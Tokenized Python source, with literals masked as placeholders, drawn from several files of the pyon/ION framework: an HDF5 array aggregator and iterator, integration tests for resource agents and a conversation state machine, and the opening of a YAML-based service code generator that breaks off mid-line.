'<STR_LIT:data>' ] = var <EOL> shape = var . shape <EOL> vv [ '<STR_LIT>' ] = shape <EOL> agg_shape = agg_shape or shape [ <NUM_LIT:1> : ] <EOL> assert agg_shape == shape [ <NUM_LIT:1> : ] <EOL> vv [ '<STR_LIT>' ] = shape [ <NUM_LIT:0> ] <EOL> self . _starts . append ( self . _records ) <EOL> self . _records += shape [ <NUM_LIT:0> ] <EOL> self . _stops . append ( self . _records - <NUM_LIT:1> ) <EOL> self . _vars . append ( vv ) <EOL> self . _agg_shape = agg_shape <EOL> self . _shape = ( self . _records , ) + self . _agg_shape <EOL> def __getitem__ ( self , index ) : <EOL> import h5py , numpy <EOL> assert len ( index ) == len ( self . shape ) <EOL> get_start = index [ <NUM_LIT:0> ] . start <EOL> get_stop = index [ <NUM_LIT:0> ] . stop <EOL> assert get_stop > get_start <EOL> agg_slices = index [ <NUM_LIT:1> : ] <EOL> for start , stop , var in zip ( self . _starts , self . _stops , self . _vars ) : <EOL> if stop < get_start : <EOL> continue <EOL> if start > get_stop : <EOL> continue <EOL> elif start <= get_start and stop >= get_start : <EOL> slc = slice ( get_start - start , get_stop - start ) <EOL> aggregate = var [ '<STR_LIT:data>' ] [ ( slc , ) + agg_slices ] <EOL> elif start > get_start and start < get_stop : <EOL> slc = slice ( <NUM_LIT:0> , get_stop - start ) <EOL> new = var [ '<STR_LIT:data>' ] [ ( slc , ) + agg_slices ] <EOL> aggregate = numpy . concatenate ( ( aggregate , new ) ) <EOL> return aggregate <EOL> @ property <EOL> def __array_interface__ ( self ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> @ property <EOL> def shape ( self ) : <EOL> return self . _shape <EOL> @ property <EOL> def size ( self ) : <EOL> res = <NUM_LIT:1> <EOL> for dim in self . shape : <EOL> res *= dim <EOL> return res <EOL> def __iter__ ( self ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> class ArrayIterator ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , var , buf_size = None ) : <EOL> self . var = var <EOL> self . buf_size = buf_size <EOL> self . start = [ <NUM_LIT:0> for dim in var . shape ] <EOL> self . stop = [ dim for dim in var . shape ] <EOL> self . step = [ <NUM_LIT:1> for dim in var . shape ] <EOL> self . curr_slice = '<STR_LIT>' <EOL> def __getitem__ ( self , index ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( index , tuple ) : index = ( index , ) <EOL> fixed = [ ] <EOL> length , dims = len ( index ) , len ( self . shape ) <EOL> for slice_ in index : <EOL> if slice_ is Ellipsis : <EOL> fixed . extend ( [ slice ( None ) ] * ( dims - length + <NUM_LIT:1> ) ) <EOL> length = len ( fixed ) <EOL> elif isinstance ( slice_ , ( int , long ) ) : <EOL> fixed . append ( slice ( slice_ , slice_ + <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> else : <EOL> fixed . append ( slice_ ) <EOL> index = tuple ( fixed ) <EOL> if len ( index ) < dims : <EOL> index += ( slice ( None ) , ) * ( dims - len ( index ) ) <EOL> out = self . __class__ ( self . var , self . buf_size ) <EOL> for i , ( start , stop , step , slice_ ) in enumerate ( <EOL> zip ( self . start , self . stop , self . step , index ) ) : <EOL> log . debug ( '<STR_LIT>' % type ( out ) ) <EOL> log . debug ( '<STR_LIT>' % str ( slice_ ) ) <EOL> out . start [ i ] = start + ( slice_ . start or <NUM_LIT:0> ) <EOL> out . step [ i ] = step * ( slice_ . step or <NUM_LIT:1> ) <EOL> out . stop [ i ] = start + ( slice_ . stop or stop - start ) <EOL> out . stop [ i ] = min ( stop , out . stop [ i ] ) <EOL> return out <EOL> @ property <EOL> def __array_interface__ ( self ) : <EOL> slice_ = tuple ( slice ( * t ) for t in zip ( <EOL> self . start , self . stop , self . step ) ) <EOL> data = self . var [ slice_ ] . copy ( ) <EOL> return { <EOL> '<STR_LIT:version>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : self . shape , <EOL> '<STR_LIT>' : data . dtype . str , <EOL> '<STR_LIT:data>' : data , <EOL> } <EOL> @ property <EOL> def flat ( self ) : <EOL> for block in self : <EOL> for value in block . flat : <EOL> yield value <EOL> @ property <EOL> def shape ( self ) : <EOL> return tuple ( max ( <NUM_LIT:0> , ( ( stop - start - <NUM_LIT:1> ) // step + <NUM_LIT:1> ) ) <EOL> for start , stop , step in <EOL> zip ( self . start , self . stop , self . step ) ) <EOL> def __iter__ ( self ) : <EOL> if [ dim for dim in self . shape if dim <= <NUM_LIT:0> ] : <EOL> log . warn ( "<STR_LIT>" ) <EOL> raise StopIteration <EOL> start = self . start [ : ] <EOL> stop = self . stop [ : ] <EOL> step = self . step [ : ] <EOL> ndims = len ( self . var . shape ) <EOL> while <NUM_LIT:1> : <EOL> count = self . buf_size or reduce ( mul , self . shape ) <EOL> rundim = <NUM_LIT:0> <EOL> for i in range ( ndims - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> if count == <NUM_LIT:0> : <EOL> stop [ i ] = start [ i ] + <NUM_LIT:1> <EOL> elif count <= self . shape [ i ] : <EOL> stop [ i ] = start [ i ] + count * step [ i ] <EOL> rundim = i <EOL> else : <EOL> stop [ i ] = self . stop [ i ] <EOL> stop [ i ] = min ( self . stop [ i ] , stop [ i ] ) <EOL> count = count // self . shape [ i ] <EOL> slice_ = tuple ( slice ( * t ) for t in zip ( start , stop , step ) ) <EOL> self . curr_slice = slice_ <EOL> yield self . var [ slice_ ] <EOL> if ndims == <NUM_LIT:0> : <EOL> log . warn ( "<STR_LIT>" ) <EOL> raise StopIteration <EOL> start [ rundim ] = stop [ rundim ] <EOL> for i in range ( ndims - <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ) : <EOL> if start [ i ] >= self . stop [ i ] : <EOL> start [ i ] = self . start [ i ] <EOL> start [ i - <NUM_LIT:1> ] += self . step [ i - <NUM_LIT:1> ] <EOL> if start [ <NUM_LIT:0> ] >= self . stop [ <NUM_LIT:0> ] : <EOL> log . warn ( "<STR_LIT>" ) <EOL> raise StopIteration </s>
<s> __author__ = '<STR_LIT>' <EOL> from unittest import SkipTest <EOL> from nose . plugins . attrib import attr <EOL> from pyon . agent . simple_agent import SimpleResourceAgent <EOL> from pyon . agent . agent import ResourceAgentClient <EOL> from pyon . public import IonObject <EOL> from pyon . util . int_test import IonIntegrationTestCase <EOL> class SampleAgent ( SimpleResourceAgent ) : <EOL> dependencies = [ ] <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestResourceAgentClient ( IonIntegrationTestCase ) : <EOL> def test_agent_registration ( self ) : <EOL> self . _start_container ( ) <EOL> idev = IonObject ( "<STR_LIT>" , name = "<STR_LIT>" ) <EOL> idev_id , _ = self . container . resource_registry . create ( idev ) <EOL> config = dict ( agent = dict ( resource_id = idev_id ) ) <EOL> pid1 = self . container . spawn_process ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , config ) <EOL> rac = ResourceAgentClient ( idev_id ) <EOL> rac_pid = rac . get_agent_process_id ( ) <EOL> rac_de = rac . get_agent_directory_entry ( ) <EOL> self . assertEquals ( rac_pid , pid1 ) <EOL> self . container . directory . register ( "<STR_LIT>" , "<STR_LIT>" , <EOL> ** dict ( name = "<STR_LIT>" , <EOL> container = self . container . id , <EOL> resource_id = idev_id , <EOL> agent_id = "<STR_LIT>" ) ) <EOL> entries = self . container . directory . find_by_value ( '<STR_LIT>' , '<STR_LIT>' , idev_id ) <EOL> self . assertEquals ( len ( entries ) , <NUM_LIT:2> ) <EOL> rac = ResourceAgentClient ( idev_id ) <EOL> rac_pid1 = rac . get_agent_process_id ( ) <EOL> self . assertEquals ( rac_pid1 , "<STR_LIT>" ) <EOL> entries = self . container . directory . find_by_value ( '<STR_LIT>' , '<STR_LIT>' , idev_id ) <EOL> self . assertEquals ( len ( entries ) , <NUM_LIT:1> ) <EOL> self . container . directory . register ( "<STR_LIT>" , pid1 , <EOL> ** dict ( name = "<STR_LIT>" , <EOL> container = self . container . id , <EOL> resource_id = idev_id , <EOL> agent_id = rac_de . attributes [ "<STR_LIT>" ] ) ) <EOL> rac = ResourceAgentClient ( idev_id ) <EOL> rac_pid1 = rac . get_agent_process_id ( ) <EOL> self . assertEquals ( rac_pid1 , pid1 ) <EOL> entries = self . container . directory . find_by_value ( '<STR_LIT>' , '<STR_LIT>' , idev_id ) <EOL> self . assertEquals ( len ( entries ) , <NUM_LIT:1> ) <EOL> self . container . terminate_process ( pid1 ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import os , inspect <EOL> from pyon . core . governance . conversation . core . transition import TransitionFactory <EOL> from pyon . core . governance . conversation . core . local_type import LocalType <EOL> from pyon . core . governance . conversation . core . fsm import ExceptionFSM , ExceptionFailAssertion <EOL> from pyon . core . governance . conversation . parsing . base_parser import ANTLRScribbleParser <EOL> from pyon . util . int_test import IonIntegrationTestCase <EOL> from pyon . util . log import log <EOL> from nose . plugins . attrib import attr <EOL> def purchasingAtBuyer_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> return events <EOL> def locateChoiceAtBuyer_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT:OK>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> return events <EOL> def recAtBuyer_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> return events <EOL> def recAndChoice_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> return events <EOL> def parallelAtSeller1_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT:OK>' , '<STR_LIT>' ) ) <EOL> return events <EOL> def Interrupt_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> return events <EOL> def main_auction_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT:OK>' , '<STR_LIT>' ) ) <EOL> return events <EOL> def logic_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> return events <EOL> def recAsRepeat_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT:OK>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT:OK>' , '<STR_LIT>' ) ) <EOL> return events <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestFSM ( IonIntegrationTestCase ) : <EOL> def setUp ( self ) : <EOL> cur_dir = os . path . dirname ( os . path . abspath ( inspect . getfile ( inspect . currentframe ( ) ) ) ) <EOL> self . path = '<STR_LIT>' % cur_dir <EOL> def base ( self , lt_filename , events ) : <EOL> try : <EOL> myparser = ANTLRScribbleParser ( ) <EOL> res = myparser . parse ( self . path + lt_filename ) <EOL> builder = myparser . walk ( res ) <EOL> log . debug ( builder . memory ) <EOL> log . debug ( builder . main_fsm . fsm . memory ) <EOL> log . debug ( builder . main_fsm . recursions_states ) <EOL> log . debug ( builder . current_fsm . fsm . state_transitions ) <EOL> builder . main_fsm . fsm . process_list ( events ) <EOL> except ExceptionFSM : raise <EOL> def base_logic ( self , lt_filename , events , payloads ) : <EOL> try : <EOL> myparser = ANTLRScribbleParser ( ) <EOL> res = myparser . parse ( self . path + lt_filename ) <EOL> builder = myparser . walk ( res ) <EOL> log . debug ( builder . current_fsm . fsm . state_transitions ) <EOL> builder . main_fsm . fsm . set_assertion_check_on ( ) <EOL> builder . main_fsm . fsm . process_list ( events , payloads ) <EOL> log . debug ( builder . main_fsm . fsm . interrupt_transition ) <EOL> log . debug ( builder . main_fsm . fsm . interrupt_start_state ) <EOL> except ExceptionFSM : <EOL> raise <EOL> def test_rec_as_repeat ( self ) : <EOL> self . base ( '<STR_LIT>' , recAsRepeat_events ( ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def test_simpleInteraction ( self ) : <EOL> self . base ( '<STR_LIT>' , purchasingAtBuyer_events ( ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def test_choice ( self ) : <EOL> self . base ( '<STR_LIT>' , locateChoiceAtBuyer_events ( ) [ <NUM_LIT:0> : <NUM_LIT:2> ] ) <EOL> self . base ( '<STR_LIT>' , locateChoiceAtBuyer_events ( ) [ <NUM_LIT:2> : <NUM_LIT:6> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def test_choice_wrong ( self ) : <EOL> self . base ( '<STR_LIT>' , locateChoiceAtBuyer_events ( ) [ <NUM_LIT:0> : <NUM_LIT:2> ] ) <EOL> self . assertRaises ( ExceptionFSM , self . base , '<STR_LIT>' , locateChoiceAtBuyer_events ( ) [ <NUM_LIT:1> : <NUM_LIT:4> ] ) <EOL> def test_parallel ( self ) : <EOL> self . base ( '<STR_LIT>' , parallelAtSeller1_events ( ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def test_parallel_wrong ( self ) : <EOL> self . assertRaises ( ExceptionFSM , self . base , '<STR_LIT>' , recAtBuyer_events ( ) [ <NUM_LIT:1> : ] ) <EOL> def test_logic ( self ) : <EOL> payloads = [ [ <NUM_LIT:1> ] , [ "<STR_LIT:a>" ] , [ <NUM_LIT:5> ] , [ <NUM_LIT:4> ] ] <EOL> self . base_logic ( '<STR_LIT>' , logic_events ( ) , payloads ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def test_logic_fail ( self ) : <EOL> payloads = [ [ <NUM_LIT:1> ] , [ "<STR_LIT>" ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:4> ] ] <EOL> self . assertRaises ( ExceptionFailAssertion , self . base_logic , '<STR_LIT>' , logic_events ( ) , payloads ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def test_interrupt ( self ) : <EOL> self . base ( '<STR_LIT>' , Interrupt_events ( ) [ <NUM_LIT:0> : <NUM_LIT:3> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def test_interrupt_execute_do_and_interrupt ( self ) : <EOL> self . assertRaises ( ExceptionFSM , self . base , '<STR_LIT>' , Interrupt_events ( ) [ <NUM_LIT:0> : <NUM_LIT:6> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def test_interrupt_when_interrupt_occur ( self ) : <EOL> self . base ( '<STR_LIT>' , ( Interrupt_events ( ) [ <NUM_LIT:0> : <NUM_LIT:2> ] + Interrupt_events ( ) [ <NUM_LIT:4> : <NUM_LIT:6> ] ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import datetime <EOL> import fnmatch <EOL> import inspect <EOL> import pkgutil <EOL> import os <EOL> import re <EOL> import sys <EOL> import string <EOL> import yaml <EOL> import hashlib <EOL> import traceback <EOL> from collections import OrderedDict <EOL> from pyon . core . path import list_files_recursive <EOL> from pyon . core . interfaces . interface_util import get_object_definition_from_datastore , get_service_definition_from_datastore <EOL> from pyon . ion . service import BaseService <EOL> from pyon . core . bootstrap import CFG , set_config <EOL> from pyon . util import yaml_ordered_dict ; yaml_ordered_dict . apply_yaml_patch ( ) <EOL> from pyon . ion . directory_standalone import DirectoryStandalone <EOL> templates = { <EOL> '<STR_LIT:file>' : <EOL> '''<STR_LIT>''' <EOL> , '<STR_LIT>' : <EOL> '''<STR_LIT>''' <EOL> , '<STR_LIT>' : <EOL> '''<STR_LIT>''' <EOL> , '<STR_LIT:class>' : <EOL> '''<STR_LIT>''' <EOL> '''<STR_LIT>''' <EOL> , '<STR_LIT>' : <EOL> '''<STR_LIT>''' <EOL> , '<STR_LIT>' : <EOL> '''<STR_LIT>''' <EOL> , '<STR_LIT>' : <EOL> '''<STR_LIT>''' <EOL> , '<STR_LIT>' : <EOL> '<STR_LIT>' <EOL> , '<STR_LIT>' : <EOL> '<STR_LIT>' <EOL> , '<STR_LIT>' : <EOL> '<STR_LIT>' <EOL> , '<STR_LIT>' : <EOL> '''<STR_LIT>''' <EOL> , '<STR_LIT>' : '<STR_LIT>' <EOL> , '<STR_LIT>' : <EOL> '<STR_LIT>' <EOL> , '<STR_LIT>' : <EOL> '''<STR_LIT>''' <EOL> , '<STR_LIT>' : <EOL> '''<STR_LIT>''' <EOL> , '<STR_LIT>' : <EOL> '''<STR_LIT>''' <EOL> , '<STR_LIT>' : <EOL> '''<STR_LIT>''' <EOL> } <EOL> client_templates = { <EOL> '<STR_LIT>' : <EOL> '''<STR_LIT>''' , <EOL> '<STR_LIT:class>' : <EOL> '''<STR_LIT>''' , <EOL> '<STR_LIT>' : <EOL> '''<STR_LIT>''' , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : <EOL> '''<STR_LIT>''' , <EOL> '<STR_LIT>' : <EOL> '''<STR_LIT>''' , <EOL> '<STR_LIT>' : <EOL> '''<STR_LIT>''' <EOL> } <EOL> html_doc_templates = { <EOL> '<STR_LIT>' : <EOL> '''<STR_LIT>''' , <EOL> '<STR_LIT>' : <EOL> '''<STR_LIT>''' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> templates = dict ( ( ( k , string . Template ( v ) ) for k , v in templates . iteritems ( ) ) ) <EOL> client_templates = dict ( ( ( k , string . Template ( v ) ) for k , v in client_templates . iteritems ( ) ) ) <EOL> html_doc_templates = dict ( ( ( k , string . Template ( v ) ) for k , v in html_doc_templates . iteritems ( ) ) ) <EOL> class IonServiceDefinitionError ( Exception ) : <EOL> pass <EOL> class IonYamlLoader ( yaml . Loader ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class ServiceObjectGenerator : <EOL> '''<STR_LIT>''' <EOL> object_references = { } <EOL> enums_by_name = { } <EOL> currtime = str ( datetime . datetime . today ( ) ) <EOL> def __init__ ( self , system_name = None , read_from_yaml_file = False ) : <EOL> self . system_name = system_name <EOL> self . read_from_yaml_file = read_from_yaml_file <EOL> self . service_definitions_filename = OrderedDict ( ) <EOL> def generate ( self , opts ) : <EOL> '''<STR_LIT>''' <EOL> service_dir , interface_dir = '<STR_LIT>' , '<STR_LIT>' <EOL> data_yaml_text = self . get_object_definition ( ) <EOL> service_yaml_text = self . get_service_definition ( ) <EOL> enum_tag = u'<STR_LIT>' <EOL> self . opts = opts <EOL> set_config ( ) <EOL> rpv_convos_enabled = CFG . get_safe ( '<STR_LIT>' , False ) <EOL> print '<STR_LIT>' % rpv_convos_enabled <EOL> def enum_constructor ( loader , node ) : <EOL> val_str = str ( node . value ) <EOL> val_str = val_str [ <NUM_LIT:1> : - <NUM_LIT:1> ] . strip ( ) <EOL> if '<STR_LIT:name>' in val_str : <EOL> name_str = val_str . split ( '<STR_LIT:U+002C>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] . split ( '<STR_LIT:=>' ) [ <NUM_LIT:1> ] . strip ( ) <EOL> return "<STR_LIT:!>" + str ( name_str ) <EOL> else : <EOL> return "<STR_LIT>" <EOL> yaml . add_constructor ( enum_tag , enum_constructor , Loader = IonYamlLoader ) <EOL> defs = yaml . load_all ( data_yaml_text , Loader = IonYamlLoader ) <EOL> def_dict = { } <EOL> for def_set in defs : <EOL> for name , _def in def_set . iteritems ( ) : <EOL> if isinstance ( _def , OrderedDict ) : <EOL> def_dict [ name ] = _def <EOL> tag = u'<STR_LIT>' % ( name ) <EOL> def constructor ( loader , node ) : <EOL> value = node . tag . strip ( '<STR_LIT:!>' ) <EOL> if value in self . enums_by_name : <EOL> return { "<STR_LIT>" : True , "<STR_LIT:value>" : value + "<STR_LIT:.>" + self . enums_by_name [ value ] [ "<STR_LIT:default>" ] , "<STR_LIT:type>" : value } <EOL> else : <EOL> return str ( value ) + "<STR_LIT>" <EOL> yaml . add_constructor ( tag , constructor , Loader = IonYamlLoader ) <EOL> xtag = u'<STR_LIT>' % ( name ) <EOL> def extends_constructor ( loader , node ) : <EOL> if isinstance ( node , yaml . MappingNode ) : <EOL> value = loader . construct_mapping ( node ) <EOL> else : <EOL> value = { } <EOL> return value <EOL> yaml . add_constructor ( xtag , extends_constructor , Loader = IonYamlLoader ) <EOL> defs = yaml . load_all ( service_yaml_text , Loader = IonYamlLoader ) <EOL> for def_set in defs : <EOL> for name , _def in def_set . get ( '<STR_LIT>' , { } ) . iteritems ( ) : <EOL> if isinstance ( _def , OrderedDict ) : <EOL> def_dict [ name ] = _def <EOL> tag = u'<STR_LIT>' % ( name ) <EOL> def constructor ( loader , node ) : <EOL> value = node . tag . strip ( '<STR_LIT:!>' ) <EOL> if value in self . enums_by_name : <EOL> return { "<STR_LIT>" : True , "<STR_LIT:value>" : value + "<STR_LIT:.>" + self . enums_by_name [ value ] [ "<STR_LIT:default>" ] , "<STR_LIT:type>" : value } <EOL> else : <EOL> return str ( value ) + "<STR_LIT>" <EOL> yaml . add_constructor ( tag , constructor , Loader = IonYamlLoader ) <EOL> xtag = u'<STR_LIT>' % ( name ) <EOL> def extends_constructor ( loader , node ) : <EOL> if isinstance ( node , yaml . MappingNode ) : <EOL> value = loader . construct_mapping ( node ) <EOL> else : <EOL> value = { } <EOL> return value <EOL> yaml . add_constructor ( xtag , extends_constructor , Loader = IonYamlLoader ) <EOL> yaml_text = data_yaml_text <EOL> defs = yaml . load_all ( yaml_text , Loader = IonYamlLoader ) <EOL> for def_set in defs : <EOL> for name , _def in def_set . iteritems ( ) : <EOL> tag = u'<STR_LIT>' % ( name ) <EOL> yaml . add_constructor ( tag , self . doc_tag_constructor ) <EOL> xtag = u'<STR_LIT>' % ( name ) <EOL> yaml . add_constructor ( xtag , lambda loader , node : { } ) <EOL> svc_signatures = { } <EOL> sigfile = os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if os . path . exists ( sigfile ) : <EOL> with open ( sigfile , '<STR_LIT:r>' ) as f : <EOL> cnts = f . read ( ) <EOL> svc_signatures = yaml . load ( cnts ) <EOL> count = <NUM_LIT:0> <EOL> raw_services = { } <EOL> service_dep_graph = { } <EOL> client_defs = { } <EOL> yaml_file_re = re . compile ( '<STR_LIT>' ) <EOL> for yaml_file in self . get_service_definition_file_path ( service_dir ) : <EOL> file_path = yaml_file_re . match ( yaml_file ) . group ( <NUM_LIT:2> ) <EOL> interface_base , interface_name = os . path . dirname ( file_path ) , os . path . basename ( file_path ) <EOL> interface_file = os . path . join ( '<STR_LIT>' , interface_base , '<STR_LIT>' % interface_name ) <EOL> parent_dir = os . path . dirname ( interface_file ) <EOL> if not os . path . exists ( parent_dir ) : <EOL> os . makedirs ( parent_dir ) <EOL> parent = parent_dir <EOL> while True : <EOL> curdir = os . path . split ( os . path . abspath ( parent ) ) [ <NUM_LIT:1> ] <EOL> if curdir == '<STR_LIT>' : <EOL> break <EOL> else : <EOL> parent = os . path . split ( os . path . abspath ( parent ) ) [ <NUM_LIT:0> ] <EOL> pkg_file = os . path . join ( parent , '<STR_LIT>' ) <EOL> if not self . opts . dryrun and not os . path . exists ( pkg_file ) : <EOL> open ( pkg_file , '<STR_LIT:w>' ) . close ( ) <EOL> pkg_file = os . path . join ( parent_dir , '<STR_LIT>' ) <EOL> if not self . opts . dryrun and not os . path . exists ( pkg_file ) : <EOL> open ( pkg_file , '<STR_LIT:w>' ) . close ( ) <EOL> skip_file = False <EOL> yaml_text = self . get_yaml_text ( yaml_file ) <EOL> if ( yaml_text ) : <EOL> m = hashlib . md5 ( ) <EOL> m . update ( yaml_text ) <EOL> cur_md5 = m . hexdigest ( ) <EOL> if yaml_file in svc_signatures and not opts . force : <EOL> if cur_md5 == svc_signatures [ yaml_file ] : <EOL> print "<STR_LIT>" % interface_name <EOL> skip_file = True <EOL> if opts . dryrun : <EOL> count += <NUM_LIT:1> <EOL> print "<STR_LIT>" % interface_name <EOL> skip_file = True <EOL> if not skip_file : <EOL> svc_signatures [ yaml_file ] = cur_md5 <EOL> defs = yaml . load_all ( yaml_text ) <EOL> for def_set in defs : <EOL> if '<STR_LIT>' in def_set : <EOL> for obj_name in def_set [ '<STR_LIT>' ] : <EOL> tag = u'<STR_LIT>' % ( obj_name ) <EOL> yaml . add_constructor ( tag , self . doc_tag_constructor ) <EOL> continue <EOL> service_name = def_set . get ( '<STR_LIT:name>' , None ) <EOL> class_docstring = def_set . get ( '<STR_LIT>' , "<STR_LIT>" ) <EOL> spec = def_set . get ( '<STR_LIT>' , None ) <EOL> dependencies = def_set . get ( '<STR_LIT>' , None ) <EOL> meth_list = def_set . get ( '<STR_LIT>' , { } ) or { } <EOL> client_path = ( '<STR_LIT:.>' . join ( [ '<STR_LIT>' , interface_base . replace ( '<STR_LIT:/>' , '<STR_LIT:.>' ) , '<STR_LIT>' % interface_name ] ) , '<STR_LIT>' % self . service_name_from_file_name ( interface_name ) ) <EOL> class_docstring_lines = class_docstring . split ( '<STR_LIT:\n>' ) <EOL> first_time = True <EOL> class_docstring_formatted = "<STR_LIT>" <EOL> for i in range ( len ( class_docstring_lines ) ) : <EOL> class_docstring_line = class_docstring_lines [ i ] <EOL> if class_docstring_line == "<STR_LIT>" and i == len ( class_docstring_lines ) - <NUM_LIT:1> : <EOL> break <EOL> if first_time : <EOL> first_time = False <EOL> else : <EOL> class_docstring_formatted += "<STR_LIT>" <EOL> class_docstring_formatted += class_docstring_line <EOL> if not skip_file : <EOL> if service_name in raw_services : <EOL> raise StandardError ( "<STR_LIT>" % service_name ) <EOL> raw_services [ service_name ] = { '<STR_LIT:name>' : service_name , <EOL> '<STR_LIT>' : class_docstring_formatted , <EOL> '<STR_LIT>' : spec , <EOL> '<STR_LIT>' : dependencies , <EOL> '<STR_LIT>' : meth_list , <EOL> '<STR_LIT>' : interface_file , <EOL> '<STR_LIT>' : interface_name , <EOL> '<STR_LIT>' : client_path } <EOL> if not service_name in service_dep_graph : <EOL> service_dep_graph [ service_name ] = set ( ) <EOL> for dep in dependencies : <EOL> service_dep_graph [ service_name ] . add ( dep ) <EOL> client_defs [ service_name ] = client_path <EOL> print "<STR_LIT>" , len ( raw_services ) , 